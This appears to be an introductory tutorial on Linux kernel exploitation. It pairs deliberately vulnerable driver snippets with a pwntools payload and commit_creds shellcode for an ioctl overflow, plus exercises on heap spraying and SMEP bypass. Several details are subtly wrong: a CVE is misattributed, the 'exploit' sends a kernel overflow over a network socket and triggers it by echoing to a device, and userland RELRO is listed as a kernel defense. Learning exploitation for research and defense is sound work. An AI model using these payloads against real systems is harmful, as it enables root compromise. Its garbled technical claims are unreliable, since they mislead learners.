Linux Kernel Exploitation Fundamentals:...

Introduction

Linux kernel exploitation is the art and science of abusing bugs in the privileged part of the operating system to gain arbitrary code execution with kernel (root) privileges. It sits at the apex of privilege escalation: once you have a kernel foothold, you can bypass any user-space restriction, modify security mechanisms, and obtain full control of the host.

Understanding kernel exploitation is crucial for red-teamers, bug-bounty hunters, and defensive engineers alike. Modern attack surfaces - container escapes, hypervisor breakouts, and firmware compromises - often begin with a kernel vulnerability.

Real-world relevance: CVE-2021-3493 (a local privilege escalation in the Linux OverlayFS driver) and CVE-2022-0185 (a use-after-free in the netfilter subsystem) both demonstrated how a single kernel bug can affect millions of servers worldwide.

Prerequisites

Solid grasp of Linux Privilege Escalation Fundamentals, especially SUID/SGID binary exploitation.
Familiarity with Linux Capabilities Abuse - knowing how capabilities can be dropped or retained.
Basic C programming, assembly, and debugging experience.
Comfort with Linux command line tools (grep, awk, etc.).

Core Concepts

Before diving into the subtopics, we need to internalize a few overarching ideas:

Ring Levels & Execution Modes: The CPU runs in user mode (Ring 3) for applications and kernel mode (Ring 0) for privileged code. Transition is mediated by system calls, interrupts, and exceptions.
Kernel Isolation: Modern kernels employ mitigations such as KASLR (Kernel Address Space Layout Randomization), SMEP/SMAP (preventing user-space execution from kernel mode), and read-only data sections.
Attack Surface: Anything that crosses the user↔kernel boundary (syscalls, ioctl, procfs, sysfs, netlink) is a potential entry point.
Exploit Primitive: Most kernel exploits rely on gaining arbitrary read/write in kernel memory, then hijacking control flow (e.g., via function pointer overwrite or return-oriented programming).

Below we break each subtopic down with diagrams described in text, concrete code snippets, and practical tips.

Kernel architecture and execution modes

The Linux kernel is a monolithic design: a single binary image that contains core subsystems (scheduler, memory manager, networking, filesystems) and device drivers. Execution modes are:

User mode (Ring 3): All regular processes run here. Direct access to privileged instructions is prohibited.
Kernel mode (Ring 0): Entry points such as system_call and interrupt handlers run here.
Interrupt context: Short, non-preemptible code executed in response to hardware or software interrupts.

Diagram (textual):

+-------------------+ System Call +-------------------+
| User Process |  ------------> | Kernel Entry |
| (Ring 3) | | (Ring 0) |
+-------------------+ Return +-------------------+

Key points for exploit developers:

All kernel code shares a single virtual address space; there is no user-kernel separation like in micro-kernels.
When a syscall is invoked, the CPU saves user registers on the kernel stack, switches to the kernel stack of the calling thread, and jumps to entry_SYSCALL_64 (on x86_64).
Understanding the stack layout (saved registers, pt_regs) is essential when crafting stack-based payloads.

System call interface and entry points

System calls are the primary user↔kernel gateway. The table sys_call_table maps syscall numbers to kernel function pointers. An attacker can abuse a vulnerable syscall or ioctl to trigger the bug.

Example of enumerating the syscall table address (requires root or a leak):

$ sudo cat /proc/kallsyms | grep " sys_call_table"
ffffffff81a001c0 T sys_call_table

Typical flow of a syscall on x86_64:

; Userland
mov rax, 0x3b ; execve syscall number
lea rdi, [rip+cmd] ; pointer to "/bin/sh"
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
syscall ; transition to kernel

; Kernel entry (simplified)
entry_SYSCALL_64: swapgs ; load kernel GS base SAVE_REGS ; push user registers onto kernel stack call *sys_call_table[rax] RESTORE_REGS ; pop registers back to userland swapgs sysretq

Exploiting a buggy syscall often involves:

Triggering the vulnerable path (e.g., passing a crafted pointer to ioctl).
Escalating the primitive (e.g., leaking a kernel address to defeat KASLR).
Hijacking control flow (overwriting a function pointer, return address, or using a ROP chain).

Memory layout: kernel text, data, heap, and stacks

The kernel address space is divided into several regions:

Text (code): Read-only executable segment (e.g., 0xffffffff81000000-0xffffffffa0000000 on x86_64). Contains the core kernel functions.
ROData: Read-only constants, often placed after text.
Data / BSS: Writable globals, e.g., init_task, cpu_online_mask.
Heap (kmalloc): Dynamically allocated memory via kmalloc. Managed by the slab allocator.
Stacks: Each thread has a kernel stack (usually 8 KB on x86_64). Interrupts use a separate interrupt stack.
Modules: Loadable kernel modules (LKMs) reside in a separate region, often easier to target for ROP because they are not compiled with PIE.

Visual layout (textual diagram):

0xffffffff a0000000  <-- top of kernel address space
|-------------------| Kernel modules (if any)
| .text |
| .rodata / .data  |
| .bss |
|-------------------|
| kmalloc heap |
|-------------------|
| per-CPU data |
|-------------------|
| thread stacks  |
0xffffffff 80000000  <-- KASLR base (randomized per boot)

Key exploitation takeaways:

Knowing the location of swapgs and pt_regs on the stack helps when overwriting return addresses.
Leaking any kernel pointer (e.g., from procfs or kallsyms) defeats KASLR and enables precise ROP gadget hunting.
Heap grooming (using kmalloc and kfree) is essential for use-after-free or out-of-bounds exploits.

Common kernel vulnerability classes (race conditions, buffer overflows, use-after-free)

Kernel bugs fall into a few well-studied categories. Below we summarise each with a miniature PoC.

1. Race Conditions (TOCTOU)

A Time-of-Check-to-Time-of-Use flaw occurs when the kernel validates a resource, releases the lock, and later uses the resource assuming it is unchanged.

int vulnerable_open(const char __user *filename, int flags)
{ struct stat st; if (stat_user_path(filename, &st) < 0) return -ENOENT; /* TOCTOU: the file could be replaced here */ return sys_open(filename, flags);
}

Exploitation tip: race the stat check with a symlink that points to a privileged file, then replace the symlink after the check but before open executes.

2. Buffer Overflows

Classic stack or heap overflow inside kernel code. Example: an unchecked copy from user space.

static long vuln_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{ char buf[64]; if (copy_from_user(buf, (void __user *)arg, 128)) return -EFAULT; // copies 128 bytes into a 64-byte buffer! // ... use buf ... return 0;
}

After overflowing buf, the attacker can overwrite adjacent kernel data structures or saved return addresses on the stack.

3. Use-After-Free (UAF)

When the kernel frees an object but continues to reference it, a malicious user can allocate controlled data in its place.

struct foo *f = kmalloc(sizeof(*f), GFP_KERNEL);
/* ... */
kfree(f);
/* later */
if (f->enabled) // UAF: f may now point to attacker-controlled memory do_something();

Exploitation strategy: spray the heap with objects of known layout (e.g., msg_msg structures via System V message queues) to occupy the freed slot, then trigger the use.

Each class often requires a combination of primitive leakage (infoleak) and heap grooming to turn into full kernel code execution.

Tools for kernel analysis (objdump, readelf, gdb, crash, pwntools)

Effective exploitation relies on solid tooling.

objdump / readelf: Disassemble the kernel image, list symbols, and locate sections.

$ objdump -d /boot/vmlinuz-$(uname -r) | less
$ readelf -s /boot/vmlinuz-$(uname -r) | grep " sys_call_table"

gdb (with vmlinux): Debug the kernel in QEMU or via kgdb. Use target remote :1234 to attach.
```
(gdb) file vmlinux
(gdb) target remote :1234
(gdb) break do_sys_open
(gdb) continue
```
crash: A specialized kernel debugging tool that can analyze a live system or core dump.
```
$ crash /usr/lib/debug/lib/modules/$(uname -r)/vmlinux /proc/kcore
crash> bt
```
pwntools: Python framework for rapid exploit prototyping. It can craft ioctl payloads, parse kernel symbols, and automate heap spraying.
```
from pwn import *
io = remote('target', 1337)
payload = b'A'*64 + p64(0xffffffffdeadbeef)  # overwrite function ptr
io.send(payload)
```

Tip: keep a local copy of vmlinux (the uncompressed ELF with symbols) for each kernel version you target. It dramatically speeds up static analysis.

Basic exploit development workflow for kernel bugs

1. Identify the entry point: Locate the vulnerable syscall/ioctl/path. 2. Obtain a primitive: Leak a kernel address (defeat KASLR) or achieve arbitrary read/write. 3. Craft a reliable primitive: Use heap grooming, race exploitation, or corrupted object reuse. 4. Build a payload: ROP chain, function-pointer overwrite, or direct commit_creds(prepare_kernel_cred(0)) shellcode. 5. Test in a VM: Use QEMU/KVM with snapshotting to iterate quickly. 6. Bypass mitigations: Disable SMEP/SMAP via swapgs tricks, or use retpoline-compatible gadgets. 7. Deliver & gain root: Trigger the bug, execute payload, spawn a root shell.

Practical Examples

Below we walk through a simplified ioctl buffer overflow that leads to a commit_creds payload.

Step 1 - Locate the vulnerable driver

$ lsmod | grep vuln_driver
vuln_driver 16384 0

Device node: /dev/vuln. The driver implements vuln_ioctl that copies 256 bytes from user space into a 128-byte kernel buffer.

Step 2 - Build the overflow payload

We need the address of commit_creds and prepare_kernel_cred. Leak them via /proc/kallsyms (requires CAP\_SYSLOG) or via a separate info-leak.

from pwn import *

# Assume we already have the addresses
commit_creds = 0xffffffff810a1420
prepare_kernel_cred = 0xffffffff810a1810

# Shellcode: call commit_creds(prepare_kernel_cred(0))
# In x86_64 assembly (escaped for HTML)
sc = ( b"\x48\xc7\xc7\x00\x00\x00\x00" # mov rdi,0 b"\x48\xb8" + p64(prepare_kernel_cred) + b"\xff\xd0" # call prepare_kernel_cred b"\x48\x89\xc7" # mov rdi,rax b"\x48\xb8" + p64(commit_creds) + b"\xff\xd0" # call commit_creds b"\xcc" # int3 for debugging
)

payload = b'A'*136 + sc # overflow saved RIP

io = remote('victim', 1337)
io.send(payload)
io.interactive()

Step 3 - Trigger

$ echo -ne "$(python3 payload.py)" > /dev/vuln

If successful, the kernel process executing the ioctl will have UID 0, and you can read /proc/self/status to confirm.

Tools & Commands

grep -i "commit_creds" /proc/kallsyms - locate credential functions.
objdump -d vmlinux | grep -i "swapgs" - find useful gadgets.
gdb -q vmlinux - set breakpoints on do_sys_open to monitor execution.
crash -d /usr/lib/debug/lib/modules/$(uname -r)/vmlinux /proc/kcore - inspect kernel memory after crash.
python -m pwntools.asm "mov rdi, 0; call 0xffffffff810a1420" - assemble inline shellcode.

Defense & Mitigation

From a defender's viewpoint, the goal is to raise the bar so that a kernel bug cannot be turned into arbitrary code execution.

KASLR: Randomizes the base address of the kernel image; combine with CONFIG_RANDOMIZE_BASE.
Read-only relocations (RELRO): Mark .data as read-only after boot to block data-section overwrites.
Stack canaries (CONFIG\_CC\_STACKPROTECTOR): Detect overflows before function return.
Use-after-free hardening: CONFIG_DEBUG_SLAB, CONFIG_SLUB_DEBUG to add poisoning.
SMEP/SMAP: Prevent kernel from executing user-space pages; ensure they are enabled (default on modern distros).
Audit and fuzz: Employ syzkaller or Trinity to discover bugs early.

Patch management is still the most effective mitigation - keep kernels up-to-date.

Common Mistakes

Assuming static addresses: Forgetting KASLR leads to non-functional payloads.
Skipping heap grooming: Directly exploiting a UAF without preparing the heap often fails.
Overlooking SMEP/SMAP: Trying to execute shellcode in user memory without disabling SMEP results in a #GP.
Using wrong calling convention: Kernel functions use the standard System V AMD64 ABI, but some older 32-bit kernels differ.
Testing on a hardened distro: Differences in compiler flags (e.g., -fstack-protector) can invalidate an exploit that works on a custom kernel.

Real-World Impact

Kernel exploits have historically been the most severe CVEs, often receiving CVSS scores of 9.8+. They enable:

Escalation from a low-privileged container to the host (e.g., Docker breakout via OverlayFS).
Persistence by installing a rootkit in kernel space, invisible to user-land tools.
Cross-VM attacks in cloud environments where the hypervisor shares the same kernel image.

Case study (hypothetical): An attacker gains a foothold on a multi-tenant Kubernetes node by exploiting a race condition in the cgroup subsystem. By chaining the race with a commit_creds payload, they obtain root on the host and pivot to other pods, exfiltrating secrets.

My experience shows that most successful kernel exploits combine a classic primitive (e.g., arbitrary write) with a modern bypass (SMEP/SMAP evasion using swapgs or retpoline). Staying current on mitigation trends (e.g., KPTI, RSB-filling) is essential for both attackers and defenders.

Practice Exercises

Info-leak lab: Write a small kernel module that exposes a /proc entry leaking the address of init_task. Use it to defeat KASLR.
Stack overflow challenge: Compile a vulnerable driver that copies 256 bytes into a 64-byte buffer. Develop an exploit that overwrites the saved RIP and spawns a root shell.
Use-After-Free grooming: Use System V message queues to spray the heap, then trigger a UAF in a crafted driver. Verify you can control a function pointer.
SMEP bypass: Create a payload that uses a kernel ROP chain to disable SMEP temporarily, then execute user-space shellcode.

All labs should be executed inside an isolated QEMU VM with snapshots for quick rollback.

Summary

Kernel exploitation blends deep OS knowledge with low-level binary skills. Mastery of the kernel’s memory layout, system-call entry points, and common vulnerability patterns enables you to turn a simple bug into full system compromise. Coupled with a solid toolset (objdump, gdb, crash, pwntools) and an awareness of modern mitigations, you can both develop powerful exploits and design robust defenses.

Key takeaways:

Know the execution flow from user-space syscall to kernel handler.
Map the kernel address space: text, data, heap, stacks, modules.
Identify the primitive a bug gives you (read/write, arbitrary code).
Use reliable tooling and automate repetitive steps with pwntools.
Always consider mitigations - KASLR, SMEP, stack canaries - and plan bypasses early.

Linux Kernel Exploitation Fundamentals: Introductory Guide